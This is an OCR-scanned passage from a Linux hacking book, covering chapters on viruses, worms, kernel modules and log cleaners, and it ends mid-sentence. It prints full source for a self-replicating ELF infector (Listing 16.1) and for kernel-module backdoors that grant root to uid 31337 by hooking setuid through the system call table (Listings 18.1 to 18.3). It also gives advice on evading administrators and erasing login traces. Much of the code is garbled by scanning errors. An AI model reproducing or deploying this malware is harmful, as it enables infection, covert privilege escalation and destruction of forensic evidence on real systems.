modified contents again: 


# strip ./hello 


# readelf -s ./hello 

Symbol table '.dynsym' contains @ 

Num: Value Size Type Bind 
O: 00000000 0 NOTYPE LOCAL 
1: O0804830¢ 129 FUNC WEAK 
2: O804831lc 172 FUNC WEAK 
3: O804832c 202 FUNC GLOBAL 
4; 0804833c 50 FUNC GLOBAL 
S: O804834c 157 FUNC WEAK 
6B: O80484e4 4 OBJECT GLOBAL 
7; OO000000 0 NOTYPE WEAK 
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2i1 


symbol information from the hello file and check the 


entries: 
Vis 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 


Ndx Name 
UND 
UND register frame info@GLIBC 2.0 (2) 
UND  deregister frame info@GLIBC 2.0 (2} 
UND _libc start _main@GLIBC 2.0 (2) 
UND printfe@GLIBC 2.0 (2) 
UND __cxa_finalize@GLIBC 2.1.3 (3) 
14 IO stdin_used 
UND gmon start 


The .symtab section was deleted but the .dynsym section remains. This section stores im- 
portant system libraries’ dynamic linking information and strip does not touch it, because 
the program cannot operate properly without this section. 


Chapter 16: Viruses 





There have been many viruses created for UNIX-like systems in general and for Linux in par- 
ticular, but none has become widely-spread. This is because in UNIX-like systems, access 
privileges are strictly delimited, and for a virus to be able to infect the entire system it must 
have root privileges. 

However, a serious local vulnerability discovered in a system would make it possible to in- 
fect the entire system even without root privileges. This can be achieved by combining a virus 
(an ELF infector) with an exploit that takes advantage of such a local vulnerability. Hoping 
that sooner or later a vulnerability affecting numerous Linux systems will be discovered, hack- 
ers are preparing by practicing writing infectors. But even in this case, a serious epidemic 
would be almost impossible, because for a virus to spread it must be launched on numerous 
systems. This is not as easy as it used to be: The days when one and all exchanged diskettes 
have been long gone into history. Currently, UNIX system administrators mostly download 
their software from reliable Internet sources. Therefore, unless a popular Internet archive with 
executable programs is infected, chances of a Linux virus becoming widespread are negligible. 
And if a virus is equipped with a mechanism for self-propagating and replicating over the 
Internet, it will no longer be a virus but a worm (see Chapter 17). 

Most infector viruses are written for executable ELF files, but because scripts (perl, sh, 
etc.) are popular in UNIX systems, there also are viruses written in a script language that infect 
only scripts. Because this book is C-oriented, only C-language ELF infectors are considered, 
although nothing is to prevent you from writing an ELF infector in assembler. 

Listing 16.1 later in this chapter shows the source code for the simplest and the most 
universal ELF infector. You can also find it in the /PART IV/Chapter 16 directory on the 
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accompanying CD-ROM. The infector doesn't do anything fancy; it simply seeks a victim — 
an ELF file — in the current directory and adds its body to the beginning of the victim's code. 
To avoid arousing the user’s suspicions, when the infected file is launched, the infector 
temporarily separates its body from that of the victim, creates a temporary file, into which the 
body of the victim is copied, and launches this file for execution. Then the infector deletes 
the temporary file, seeks another victim in the current directory, and writes its body at the 
beginning of the victim's body. This is how the virus replicates. 

To avoid infecting an already infected victim, the infector tacks a mark, "Ivan 
Sklyaroff", at the end of each infected victim. Before infecting another prospective candi- 
date, the infector checks it for the mark. If the victim already has it, the infector leaves it alone 
and continues looking for another prey. 

In addition, the infector checks whether a prospective infection candidate is an executable 
ELF file. To this end, it looks for the Ox7£,'E','L', "F' signature at the beginning of the file 
and checks whether the file type field (e type) in the victim’s ELF header is set to the ET EXEC 
constant, which means that the file is executable. If the infector does not perform these 
checks, it will add itself to script, text, and all other types of files, thereby giving itself away. 

The infector infects only one target in the current directory each time it is ran. The num- 
ber of victims per run can be increased by changing the value of the MAX_ VICTIMS constant. 
You can also add the capability to spread the infection in all accessible directories. 

The rest of the code ought to be clear from the comments. I recommend that you start 
studying the program from the main() function. 

The infector program is compiled as usual: 

# goc elfinfector.c -o elfinfector 

The size of the compiled infector can be reduced by processing it with the st rip utility: 

# Strip elfinfector 

An important detail: The VIRUS LENGTH constant in the source code must be set to the ex- 
act size of the compiled program; otherwise, the infector will not work properly. You may 
have to compile the infector several times using a different value each time to find the right 
value. The value of 5,296 is the size of the compiled infector in my system (after being proc- 
essed by the strip utility), but it can be different in your system. 

In addition to the described infection methods, more complex ones can be used. These 
include the following: 


O By modifying the ELF file’s headers, the virus can create one or more extra sections in the 
beginning, middle, or end of the victim file and place its body into this section. In this 
case, the virus must change the program entry point (ec entry) to the beginning of “its” 
section. After the virus finishes its tasks, it will pass control to the victim. 

The virus can place its body into the victim’s data section (.data). (If there is not enough 
room for it in the section, the virus can increase its size.) The program entry point 
(e entry) is then changed to point to the start of the virus’s code in the data section. After 
the virus finishes with its tasks, it will pass control to the victim. Because the .data section 
usually has no execution privileges, the virus must set this privilege. 


L) 
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O Analogous to its actions in the data section, the virus can install itself into the code 
(.text) or some other suitable section. 


To give your brain a workout, try to implement one or even all of these methods. To be 
able to handle all of these tasks, I urge you to familiarize yourself with the following materials: 


l. “The ELF Virus Writing HOWTO” by Alexander Bartolich (http://vx.netlux.org/lib/ 


vab00.html). 
2. “UNIX Viruses” by Silvio Cesare (http://vx.netlux.org/lib/vsc02. html). 





Listing 16.1. ELF infector (elfinfector.c) 





finclude <stdio.h> 
Finclude <stdlib.h> 
#include <sys/stat.h> 
finclude <fcntl.h> 
Finclude <dirent.h> 
#include <elf.h> 


fdefine VIRUS_LENGTH 5296 /* Correct length of the compiled infector */ 
fdefine TMP FILE "/tmp/body.tmp" 

#define MAX VICTIMS 1 /* Maximum number of infected files per launch */ 
fdefine INFECTED "Ivan Sklyaroff" /* Infected file mark */ 


char *body, *newbody, *virbody; 

int fd, lén, icount; 

struct stat status; 

Elf32 Ehdr ehdr; // For accessing the ELF header 


infect (char *victim) 

{ 
char belf(4)] = ('\x7E£', "E', 'L', 'E'}; 
char buf[64]; 


/* Reading the victim's ELF header */ 
fd = open(victim, O_RDWR, status.st_mode); 
read(fd, sehdr, sizeof(ehdr) ); 


/* Checking whether the prospective victim is an ELF file */ 
if {strnemp(ehdr.e ident, belf, 4) != 0) 
return; // Exiting the function if the victim is not an ELF file 
if (ehdr.e type != ET EXEC) 
return; // Exiting the function if the victim is not an executable file 


‘* Otherwise, reading the victim's body and saving it in a buffer */ 
fstat(fd, &status); 

lseek(fd, 0, SEEK_SET); 

newbody = malloc(status.st size); 

read(fd, newbody, status.st_ size); 


/* Checking for the infection mark at the end of the victim's hody */ 


i 
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lseek(fd, status.st_size - sizeof(INFECTED), SEEK SET); 
read(fd, &buf, sizeof (INFECTED) ); 


/* If there is a mark, the file is already infected; 
therefore, exit the function. */ 

if (strnemp(buf, INFECTED, sizeof(INFECTED)) == 0) 
return; 


/* Writing the virus body at the start of the file */ 
lseek(fd, 0, SEEK_SET); 

wWrite(fd, virbody, VIRUS_LENGTH); 

/* Writing the victim's body */ 

write (fd, newbody, status. st size); 

/* Adding an infection mark at the end of the victim's body */ 
write (fd, INFECTED, sizeof(INFECTED) }; 

close (fd); // Closing the infected file 


icount++; // Incrementing the infected file counter 


printf ("ts infected!\n", victim); 


find victim() 


{ 


} 


DIR *dir_ptr; 
struct dirent *d; 
char dir[100); 


getcwd(dir, 100); // Determining the current directory 
dir ptr = opendir(dir); // Opening the current directory 


/* Reading the directory while the elements (files) last */ 
while (d = readdir(dir ptr)) 
{ 
if (d->d ino != 0) { 
if (icount < MAX_VICTIMS) // Checking the infection counter 
infect (d->d_ name); // Calling the infection counter 


int main(int argc, char *argv[], char **envp) 


{ 


/* Opening the virus's file and determining the length */ 
fd = open(argqv[0]), O RDONLY); 

fstat(fd, a&status); 

lseek(fd, 0, 0); 


/* Reading the virus's body and saving it in a buffer */ 
virbody = malloc(VIRUS_LENGTH) ; 
read(fd, virbody, VIRUS_LENGTH); 


/* Checking the virus's length */ 
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if (status.st size != VIRUS LENGTH) { 


} 


/* An infected file is launched; therefore, 
separate the body of the program from the infector. */ 
len = status.st_size - VIRUS_LENGTH; 
lseek(fd, VIRUS LENGTH, 0); 
body = malloc (len); 
read(fd, body, len); 
close (fd); 


/* Saving the original program in a temporary file */ 

fd = open(TMP_FILE, O_RDWR|O CREAT|O TRUNC, status.st_mode) ; 
write(fd, body, len); 

close (fd); 

/* Launching the original program */ 

if (fork() == 0) wait(); 

else execve (TMP FILE, argv, envp); 

/* Deleting the temporary file */ 

unlink (TMP_FILE); 


/* Looking for a victim and infecting it */ 
Find victim(); 


/* Exiting the infector */ 
close (fd); 
exit (0); 


Chapter 17: Worms 





Like viruses, worms are computer programs that propagate themselves over a network. 
The main difference between worms and viruses is that the former are self-sufficient pro- 
grams; that is, worms don’t have to attach themselves to an executable file to replicate. 

I intended to write a practice worm for this chapter and use it to examine all details of 
programming a worm, but for several reasons I changed my mind about this idea. This should 
not upset you too much (you are not going to write real Internet worms, are you’). A worm is 
simply a combination of network, exploit, and in some cases virus technologies, which are 
considered in detail in this book. Therefore, | believe it is enough to simply describe how all of 
these technologies interact in a worm and to give general worm construction principles to en- 
able you to understand how to program one. You can also find the complete source code of 
the classical Morris worm (now harmless) in the /PART IV/Chapter 17 directory on the ac- 
companying CD-ROM. This was the first computer worm, which became known all over the 
world. It was created by Robert Morris Jr., a student at the Cornell University. The worm 
started spreading on November 2, 1988, striking thousands of computers connected to the 
ARPANET network, including computers at scientific research facilities, universities, military 
agencies, and even the Pentagon. The Morris worm could only infect UNIX systems. 
The damage caused by it was estimated at $100 million. 

Basically, if numerous modifications are not counted, few UNIX worms have existed. 
In the chronological order of their appearance after the Morris worm, these are Ramen, Lion, 
Cheese, Sadmind, Adore, Slapper, and Lupper. 


280 +~=Part IV: Self-Replicating Hacking Software 


You can find the detailed information for each of these worms in the Internet at any anti- 
virus software developers’ sites. 
A standard worm has three parts: 


O The head, which is also sometimes called the enabling exploit code 
O The body 
O The payload 


Alternatively, a worm can have only the body. 

The payload is intended for inflicting some damage — for example, deleting some files or 
organizing a DoS attack from the infected machine against some host — or simply for install- 
ing a backdoor to control the infected computer remotely. The Morris worm had no payload; 
that is, it did not have any built-in destructive functions. 

The worm head is usually an exploit that takes advantage of a software bug (buffer over- 
flow, format line error, etc.) to take over a remote machine, establishes a TCP/IP connection, 
and loads from the network the body of the worm and the payload (if the worm has one). 
Some worms can load themselves entirely on the remote machine right away; that is, their 
head, body, and payload are a single piece of code. Naturally, such worms are much easier to 
implement. The reason for a separate head ts that often the size of overflowing buffers is just 
a few dozens of bytes, which is only enough to hold a small loader code. Worms often have 
more than one head. For example, the Ramen worm had three heads. If Ramen determined 
that the victim’s computer ran under Red Hat 6.2, one of its heads exploited the wu-ftpd dae- 
mon and the other exploited the rpc.statd daemon. If the computer ran under Red Hat 7.0, 
only the third head was used, which exploited the LPRng daemon. The Morris worm had two 
true heads, which exploited the fingerd daemon and the sendmail daemon. In addition, it had 
a third head, which was not actually an exploit but a tool to crack passwords and connect to 
the rsh/rexec services. 

Once the worm body is loaded, it takes charge of propagating the worm from the infected 
system and launches the payload. A worm can also install itself in the startup section, although 
it may not do this. 

To continue propagating, the worm must determine the IP addresses of hosts suitable for 
infection. It accomplishes this task in several ways: by scanning IP addresses of the current 
subnet, generating random IP addresses, searching the victim’s local files for network ad- 
dresses, and importing data from the victim’s mail log. In addition to IP addresses, a worm 
can look for URLs and email addresses. 

The worm then must test whether the obtained addresses are valid and, if so, whether 
the given remote host runs under a vulnerable version of the operating system or runs 
a vulnerable service that can be infected using one or more of the worm’s heads. This task is 
accomplished by simply sending a request to the host and examining the reply. The request 
type depends on the specific service or operating system; for a Web server, this can be simply a 
GET request. 
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Next the worm must check whether the given host is already infected with a copy of the 
worm. This is often done by checking for a certain word or a character combination; that is, 
the worm sends a keyword in a network request and, if the host is already infected, the copy 
of the worm on the infected machine sends another keyword in reply. This is where 
Robert Morris blundered. Quite logically, he foresaw that it would be too easy to defend 
against his worm by simply running a process that would answer “yes” if asked if there was 
already a copy running on the prospective infection candidate, giving an appearance that 
the host is already infected. Therefore, he equipped his worm with a mechanism to ignore 
every seventh positive reply and to proceed with infection anyway. But he selected too high 
of the ratio, and already infected systems became infected repeatedly, each new infection 
consuming a portion of the computer and network channel resources to the point where 
there was none left for normal operation. 

After a victim is selected, the worm head (or heads) exploits a bug in its software and the 
infection continues according to the described scheme. 


PART V: 
LOCAL HACKING TOOLS 











Chapter 18: Introduction to 
Kernel Module Programming 





Many types of Linux hacker utilities use the LKM technology. A module is a chunk of code that 
the kernel can load and unload as necessary. Loading a module expands the kernel functionality 
without requiring the operating system to be restarted. Because a module is a part of the kernel, 
using modules makes it possible to expand system capabilities practically limitlessly. Even though 
log cleaners (considered in Chapter 19) do not use the LKM technology, keyloggers and rootkits 
(considered in Chapters 20 and 21) do. Therefore, in this chapter I present the fundamentals of 
kernel module programming. Programming modules for the version 2.4x kernel is different 
from programming modules for the version 2.6.x kernel. Later in the book, only the 2.6.x kernel 
will be considered, but in this chapter, programming LKM for the 2.4 kernel is also considered, 
because this kernel version is still used in some servers; moreover, this will allow you to better 
understand the changes that took place in the 2.6.x kernel. You can obtain more detailed infor- 
mation concerning kernel module programming from other literature, such as The Linux Kernel 
Module Programming Guide (http://tldp.org/guides.html). This guide is being constantly up- 


dated, starting from version 2.2.x. 


18.1. Version 2.4.x Modules 


In Chapter 11, a local backdoor was considered, which was an LKM for the 2.4.x Linux kernel. 
I will use this backdoor (Listing 11.1) as an example to consider the construction of modules 
for the 2.4.* kernel. A standard kernel module consists of two functions. The first function, 
init module (), 1s called nght after the module 1s installed into the kernel. The second function, 
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cleanup module (), is called right before the module is removed from the kernel. It usually 
restores the environment that existed before the module was installed; that is, it undoes what- 
ever the init module() function did. The example module (Listing 11.1) intercepts the 
setuid system call and replaces it with its own version. This system call is always made when a 
user logs into the system, when a new user is registered, and the like. The names and numbers 
of Linux system calls are stored in the /usr/include/asm/unistd.h header file. Note that there 
are two calls for setuid in this file: 


fdefine NR setuid 23 

fdefine NR setuid32 213 

In my system, the second version (| NR setuid32) works; it is possible that the first ver- 
sion will work with your system. 

The kernel has a system call table, named sys call table, which determines the ad- 
dress of the kernel function called by the system call number. Thus, the function address for 
__NR_setuid32 is simply replaced with a pointer to the new function (I called it 
change_ setuid), which will perform the necessary operations. The new function checks 
the uid, with which the system call was made, and if it is 31337, sets the root (0) privileges 
for the current (current) user. 

Compiling the Listing 11.1 backdoor shows how 2.4.x kernel modules are compiled: 

# gcc -o bdmod.o -c bdmod.c 


The resulting object file, bdmod.o, must be copied to the directory, in which the insmod 
utility searches for modules. Usually, this is the /lib/modules directory: 

f cp bdmod.o /lib/modules 

Then the module is loaded as follows: 

f insmod Bdmod.o 

The 1smod utility is used to verify that the module has been installed. The utility displays 
the information about loaded modules, which it obtains from the /proc/modules files. 
The following is an example of this utility executing on my system: 


# lsmod 

Module Size Used by 

pomod 656 0 (unused) 
autofs 11264 l {auteclean) 
tulip 38544 l (auteclean) 


Now you can check the module’s operation by logging into the system with uid = 31337. 
Asa result, the user is granted root privileges, as is shown by running the id command: 

# id 

uld = O(root) gid = U(root) 

The module can be removed from the kernel by the nmmod command: 

# rmmod bemod 
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18.2. Version 2.6.x Modules 


In addition to the regular module structure, which is used in the 2.4.x kernel, a capability to 
use a new module structure was introduced in the 2.6.x kernel: 

#include <Linux/module.h> 

#include <Linux/kernel..h> 

#include <linux/init.h> 


MODULE LICENSE ("GPL"); 


static int init my init (void) 
{ 


return ; 
} 


static void exit my cleanup(void) 


| 


} 


module init(my init); 

module exit(my cleanup); 

Thus, the module init () andmodule exit() macro definitions (found in the /linux/init.h 
header file) make it unnecessary to name the initial and final module functions. Even though 
the new module structure is convenient, | continue using only the regular module structure, 
which is used in the 2.4.x kernel. 

The most important change in the 2.6.x kernel is that now the sys_call_table system call 
table is not exported; thus, the code in Listing 11,1 will not work in the 2. ox heme Hackers, 
however, found ways of obtaining the address of sys_call_table, two of which I consider. As an 
example, the local backdoor code shown in Listing 11.1 is modified to work on the 2.6.x kernel. 


18.2.1. Determining the Address of sys_call_table: Method One 


The address of the system calls table can be found in the System.map file, in which the kernel 
variables and functions are described: 

# grep sys call table /boot/System.map 

cO3ce760 D sys call table 

Now the following assignment can be made in the module: 

unsigned long “sys call table; 

*(long *)ésys_call_ table=0xcO03ce760; 

Afterward, system calls can be replaced using the xchg() function. Listing 18.1 shows the 
source code for a local backdoor for the 2.6.x kernel using the first method of determining the 
address of sys call table. I advise you to include the MODULE_LICENCE (GPL) macro 
definition, which specifies the licensing terms, in all hacker modules. A module will load 
without this definition, but the operating system will issue a corresponding message, which is 
entered in logs and may attract unwanted attention from the administrator. 
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Modules for the 2.6.x kernel are compiled differently than those for the 2.4.x kernel. First, 
a makefile needs to be created, with the following contents (specific for the bmod-2.c module): 

obj-m += bmod-2.0 

Then, a command to make the module is executed: 

# make -C /usr/src/linux-'uname -r' SUBDIRS=SPWD modules 


If your /usr/sre directory has the symbolic link linux to the directory containing the kernel 
sources, the make command will look as follows: 
# make -C /usr/sre/linux SUBDIRS=$SPWD modules 


Naturally, the kernel sources must be installed in your system in the /usr/src directory. 
If you don’t have the kernel sources where they are supposed to be, you should install them; 
otherwise, the module build process will fail. KDE or Gnome are convenient tools to install 
the packets. Look for a function like Program Setup in the menu. The needed kernel source 
packet usually has the name of the kernel-source-version number type. 

Executing the command creates an object file of the module, bdmod-2.ko, in the current 
directory. Note that the extension for 2.6.x kernel module object files is .ko, not .o. 

Now the module can be loaded: 

# insmod bdmod-2.ko 

A list of the installed modules can be displayed using the Lsmod command; a module can 
be deleted using the mmmod command: 

fo immoad bdamod-< 

The source code for the bmod-2.c module can be found in the /PART V/Chapter 18 direc- 
tory on the accompanying CD-ROM. 





Listing 18.1. A local LKM backdoor for the 2.6.x kernel (bdmod-2.c) 





/* Module backdoor for Linux 2.6.x */ 
#include <lLinux/module.h> 

#include <linux/kernel.h> 

#include <Linux/init.h> 

#include <linux/syscalls.h> 

#include <Linux/unistd.h> 


MODULE LICENSE ("GPL"); 


unsigned long *“sys_call table; 
int (*orig setuid) (uid _t); 


int change setuid(uid t wid) 
{ 
if (uid == 31337) 
( 
current->uid = 0; 
current->euid = 0; 
current->gid = 0; 
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current->egid = 0; 
return 0; 
} 
return (*orlg setuid) (uid); 
} 


int init module (void) 
{ 
*({long *)ésys call table = OxcO3ce760; 
orig setuid = {void *)xchq(é&sys_call_table[ 


= __ NR setuid32], change setuid); 
return 0; 
} 
void cleanup module (void) 
xchg(&sys call table{ NR setuid3Z)], orig setuid); 





18.2.2. Determining the Address of sys_call_table: Method Two 


A large minus of the first method of finding the address of the system calls table is that it has 
to be done manually and that the address changes from one system to another. Thus, an 
automatic way for finding the address of sys call table is needed. You could simply insert 
into a module a function to open the file and look for the address of sys_call_ table in it. 
But I want to show you another method to demonstrate what a keen hacker mind is capable 
of. I learned this method from the “Protection against Stack Execution (OS Linux)” article by 
hacker devOid from UkR Security Team (http://www.ustsecurity.info), 

Dev0id discovered that the address of the sys call table table is always between the end 
of the code section and the end of the data section of the current process. He also discovered 
that the sys close call is exported by the kernel. Because the system calls table contains ad- 
dresses of all system calls ordered by their numbers, dev0id arrived at an idea: By going 
through all addresses, the address of sys close could be found in the interval between the 
end of the code section and the end of the data section. Afterward, the address of 
sys call table is obtained by subtracting the call number from the found sys_close ad- 
dress. The call number of sys_close is 6. The numbers of the other system calls can be found 
in the /usr/include/asm/unistd.h header file. 

To obtain the address of the end of the code section (init mm.end code) and of the end 
of the data section (init mm.end data), devOid used the init m variable, which is an 
mm structure (described in the /arch/i386/kernel/init_task.c kernel source file). The main 
task of this variable is to describe memory management for the init kernel initiation process 
(not to be confused with the PID 1 init process). 


Unfortunately, the article is written in Russian and, as far as 1 know, no English translation of it 1s 
available yet. 
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Listing 18.2 shows the source code for a function that locates the address of the system 
calls table. This function will be used for all future 2.6.« kernel modules requiring call substi- 
tution. For the function to work, a global variable also must be defined: 


unsigned long* sys. call table; 


Listing 18.3 shows the source code for a local backdoor that uses the second method of de- 
termining the sys call table address. The module is built and installed into the kernel 
analogously, as it was done in the previous section. 

The source code for the bmod-3.c module can be found in the /PART V/Chapter 18 
directory on the accompanying CD-ROM. 

The “Linux On-the-Fly Kernel Patching without LKM” article in issue #58 of the electronic 
magazine Phrack offers another way of determining the address of the sys call table. This 
method, however, depends on the current platform and its algorithm is complex. 





Listing 18.2. Function for determining the sys_call_table address 





void find sys call table({void) 
{ 
int ij 
unsigned long *ptr; 
unsigned long arr[4]; 
/* Obtaining a pointer to the end of the code section */ 
ptr = (unsigned long *) ((init mm.end code + 4) & Oxfffffffc); 
/* Searching until the end of the data section */ 
while({(unsigned long)ptr < (unsigned long)init_mm.end data) { 
/* Finding the address of sys close */ 
if (*ptr == {unsigned long) ((unsigned long *)sys close)) { 
for(i = O; 1 < 4; it+) { 
arr[i] =* (ptr + i}; 
arrc[i]) = tarr[i] >> 16) & OxOO00ff£f; 
} 
/* Is the address really in the table? */ 
if(arr[O) != arr{2] || arr[1] != arr[(3]}) { 
/* Determining the address of the system calls table */ 
sys_call table = (ptr - NR close); 
break; 
} 
ptr++; 


} 


Listing 18.3. Local LAM backdoor for the 2.6.x kernel (bdmod-3.c) 








/* Module backdoor for Linux 2.6.x */ 
finclude <linux/module.h> 
finclude <linux/kernel.h> 
finclude <Linux/unistd.h> 
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#include <linux/syscalls.h> 
MODULE LICENSE ("GPL"); 


unsigned long* sys call table; 
int (*orig setuid) (uid t); 


void find sys call table (void) 
{ 
int i; 
unsigned long *ptr; 
unsigned long arr[4]; 


ptr = (unsigned long *) ((init_mm.end_ code + 4) & Oxfffrttfic); 
while((unsigned long)ptr < (unsigned long)init mm.end data) { 
if ("ptr == (unsigned long) {((unsigned long *)sys _ close}) { 


for(i = 0; i < 4; i++) { 
arr[i] = *{ptr + i}; 


arr[i] = larr[i] >> 16) & OxQO00ffff; 
} 
if(tarr([0] != arr({2] || arr[1]) != arr[3]) { 
sys call table = (ptr - _NR.close); 
break; 
} 
} 
ptrtt+; 


} 


int change setuid(uid t uid) 
{ 
if (uid = 31337) 
1 
current->uid = 0; 
current->euid = 0; 
current->gid = 0; 
current->egid = 0; 
return 0; 
} 
return (*orig setuid) (uid); 


} 


int init module (void) 
i 
Find sys call table(); 
orig setuid = (void *)sys_call_table[_ NR_setuid32); 
sys call table[ NR _setuid32] = (unsigned long)change setuid: 
return 0; 
} 


void cleanup module (void) 
( 

sys_call table[_ NR_setuid32] = (unsigned long)orig_ setuid; 
} 
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Chapter 19: Log Cleaners 





Log cleaners (also called log wipers) are sued for removing (cleaning) information from sys- 
tem log files. Hackers clean log files to conceal the fact of their having broken into the system 
and having access to it. Sometimes log cleaners come as a rootkit component (see Chapter 21). 
Most Linux log files are stored in the /var/log directory. 

It might look much easier to simply remove all the log files in a compromised system; how- 
ever, only the most inexperienced crackers do this, because in this case the administrator will 
promptly learn of the break-in. Log cleaners are used to remove only some of the information 
from the log files, that concerned with the hacker's actions. This prevents raising the administra- 
tor’s suspicions and allows the perpetrator to remain invisible in the system. 

There are two types of log files: text and binaries. Information in text log files is usually 
stored in the text format. The messages, secure, xferlog, and mailog files are a few examples of 
text log files. Information in binary log files is stored in the binary format. The utmp, wtmp, 
and lastlog files are a few examples of binary log files. 

Log cleaners clean logs using one of the following three methods: 


C Log entries that are to be removed are located and overwritten with spaces or zeros using 
functions like memset () or bzero(). 

© All contents of a log file except the information that needs to be concealed are copied to 
a temporary file or a temporary memory buffer and then are copied back into the log file 
overwriting the old contents. 
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O Instead of deleting the necessary information, it is replaced with fake analogs. For exam- 
ple, the hacker’s IP address can be replaced with someone else's, to either simply throw 
the investigation off the trail or to set that person up. 


There are many log cleaner utilities that modify logs in one way or another available. 
The most known of them are these: marry, logcloak, cloack2, remove, zap2, vanish, and 
wipe. Their source codes can be found at this site: http://packetstormsecurity.org. 

I will show you how to write log cleaners that work based on the first and second methods. 
The knowledge obtained in the process will be sufficient to allow you to write a log cleaner 
based on the third method by yourself. 


19.1. Structure of Binary Log Files 


Whereas text logs can be handled just like regular text files, binary logs are another story be- 
cause of their special structure. The following is a list of the main Linux log files: 


O utmp — stores information about the current connections to the system. Its standard lo- 
cation is in the /var/run folder, The information from this log is used by the who and w sys- 
tem utilities. 

 wtmp — stores the history of the connections to the system. Its standard location is in the 
ivar/log folder. The information from this log is used by the last system utilities. 

O lastlog — contains the information about the last user that logged into the system. Its 
standard location is in the /var/log folder. The information from this log is used by the 
lastlog system utility. 


Removing the utmp, wtmp and lastlog files disables log keeping. To enable log keeping, 
blank copies of these files must be created: 

# cp /dev/null /var/run/utmo 

# cp /dev/null /var/log/wtmo 

# co /dev/null /var/log/lastlog 

In addition to learning how to clean these files, cleaning the btmp log file, which stores 
information about unsuccessful login attempts, will also be considered. Its standard location 
is in the /var/log folder. The information from this log is used by the lastb command, which 
is similar to the last command. By default, there is no btmp file in the system, so to enable 
this particular logging it must be created: 

# cp /dev/null /var/log/btmp 


| have never seen a single log cleaner that would clean this log file, so this deficiency will be set 
right in the demonstration utilities. 

All of the mentioned binary logs store information about logins to the system and system 
rebootings; therefore, processes like login, getty, ftp, xdm, kdm, and the like must be able to 
write to these logs. 

If the hackers do not clean up the logs, the administrator can easily detect their presence 
in the system by simply running such utilities as who, w, last, lastlog, and lastb. Actually, 
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there are numerous ways other than cleaning the system logs for covering up one’s tracks in 
the system. You can, for example, sneak in a kernel module to intercept system calls. You can 
also replace the executable files of the who, w, and other administrative utilities with their 
modified versions that show only part of the information they are supposed to show. Those 
methods, however, fall beyond the scope of the book, and I will only consider the log cleaning 
utilities in this chapter. 

The who, w, and last utilities use only some of the much larger body of the data stored in 
the utmp and wtmp log files. The complete information from these files and also from the 
btmp file can be viewed in the human-legible format with the help of the utmpdump utility: 

# utmpdump /var/run/utmp 

# utmpdump /var/log/wtmp 

# utmpdump /var/log/btmp 

The utility outputs information in lines, each composed of eight fields enclosed in square 
brackets. The following is a sample output line: 

[7] [11422] [4/3 ] [root ] [pts/3 i { ] [0.0.0.0 
[Tue Jul 04 05:21:46 2006 J 

The first field holds the session identifier while the second holds the process ID (PID). 
The third field can hold the following values: ~~, bw, a digit, or a character and a digit. The re- 
spective meaning of these labels is: a runlevel change or a system reboot, a bootwait process, 
a TTY number, and a letter/digit combination for a pseudo-terminal (PTY). The fourth field 
can be either empty or hold the user name, reboot, or runlevel. The fifth field holds the main 
TTY or PTY, if this information is available. The sixth field holds the name of the remote host. 
If the login is performed from the local host, this field is blank. The seventh field holds the 
name of the remote system. And the last, the eighth, field holds the data and time the record 
was made. The format of the utmp and wtmp files is basically the same, only the records 
in the utmp file are ordered chronologically with the newest records at the end of the file while 
in the wtmp file this order is reversed. There often are irrelevant old records in the utmp file, 
left by improperly terminated sessions. 

Consulting man utmp or man wtmp you can find out that the utmp and wtmp log files con- 
sist of a series of structures, These structures are identical for all the wtmp, utmp, and btmp 
files and are declared in the utmp.h header file (Listing 19.1), which is located in the 
/usr/include/bits directory. 


Listing 19.1. The structure of the utmp file 
#define UT LINESIZE 12 


#define UT _NAMESIZE 32 
#define UT_HOSTSIZE 256 


struct utmp 
{ 
short int ut_type; /* Type of login */ 
pid t ut_pid; /* Process ID of login process */ 


char ut_line(UT_LINESIZE]; /* Device name (console, ttyxx) */ 
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char ut id[4]; /* The identifier from the /etc/inittab file (usually, the line number) */ 

char ut_user[UT_NAMESIZE)]); /* User name */ 

char ut host(UT HOSTSIZE); /* The name or IP address of the remote host */ 

struct exit status ut_exit; /* The exit status of a process marked as DEAD PROCESS */ 

leng int ut session; /* The session ID */ 

struct timeval ut_tv; /* The time the record was made */ 

int32 t ut_addr v6(4); /* The IP address of the remote host in the network byte order 
(for a local user this field is zero) */ 

char _unused[20]; /* Reserved for future use */ 


ye 


struct exit status | 
short int @ termination; /* The process termination status code */ 
short int @ é@xit; /* The process exit status code */ 

i 


/* For backward compatibility */ 
#define ut name ut _user 
#ifndef NO UT TIME 

#define ut_time ut_tv.tv_sec 
fendif 

fdefine ut_xtime ut_tv.tv_sec 
#define ut addr ut addr v6[0] 





The lastlog structure is also defined in the utmp.h header file (Listing 19.2). 





Listing 19.2. The lastlog structure 





struct lastlog 
{ 
__time_t 11_time; /* A time stamp */ 
char ll line[UT_LINESIZE]); /* A device name (console, ttyxx) */ 
char 11 host(UT_HOSTSIZE); /* The IP address or the name of the remote host (blank for 
a local user) */ 


hi 











There is a separate lastlog.h header file, but it usually contains only one line: #include 
<utmp.h>; that is, all information is in the utmp.h file. 

As a rule, entries in the utmp, wtmp, and lastlog files are deleted by the program that 
made them. Also, entries are not actually deleted, but the user login and host fields in the cor- 
responding structure are cleared and the value in the time field (ut_time) is changed to the 
logout time. Additionally, in the utmp and wtmp files, the entry type (ut_type) is changed 
from USER PROCESS to DEAD PROCESS. The following are the definitions for ut type taken 
from the utmp.h header file: 

rdefine EMPTY 0 /* No valid user accounting information */ 

#define RUN LVL 1 /* The system's runlevel */ 

#define BOOT TIME 2 /* Time of system boot */ 
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faefine NEW TIME 3 /* Time after system clock changed 
#define OLD TIME 4 /* Time when system clock changed 
#define INIT PROCESS 5 /* Process spawned by the init process 
fdefine LOGIN PROCESS 6 /* Session leader of a logged in user 
#iefine USER PROCESS 7 “#* Normal process */ 

#define DEAD PROCESS 8 /* Terminated process */ 

#define ACCOUNTING 59 /* System accounting */ 


Some UNIX systems use an extended utmp structure named utmpx; accordingly, log files 
in these systems are named utmps, wtmpx, and btmpx. Some log cleaners provide for clean- 
ing these log files, but our utility will not do this, because I have not seen a single Linux system 
using these log files. However, you can implement the capability for cleaning these files on 
your own, using the sample program for cleaning the utmp, wtmp, and btmp files as a guide. 

New records to the wtmp file are added using the updwtmp() and logwtmp() functions. 
There also are special functions for working with the utmp file. For example, the 
setutent () function sets the pointer to start of the utmp file, the getutent () function reads 
a line starting from the current pointer position in the file, the getutid() function performs 
forward search starting from the current pointer position, and the pututline() function 
writes a utmp ut structure to the utmp file. More detailed information about these functions as 
well as demonstration example code you can find in their corresponding man pages. There 
are, however, no special functions for working with the lastlog file. For this reason, no special 
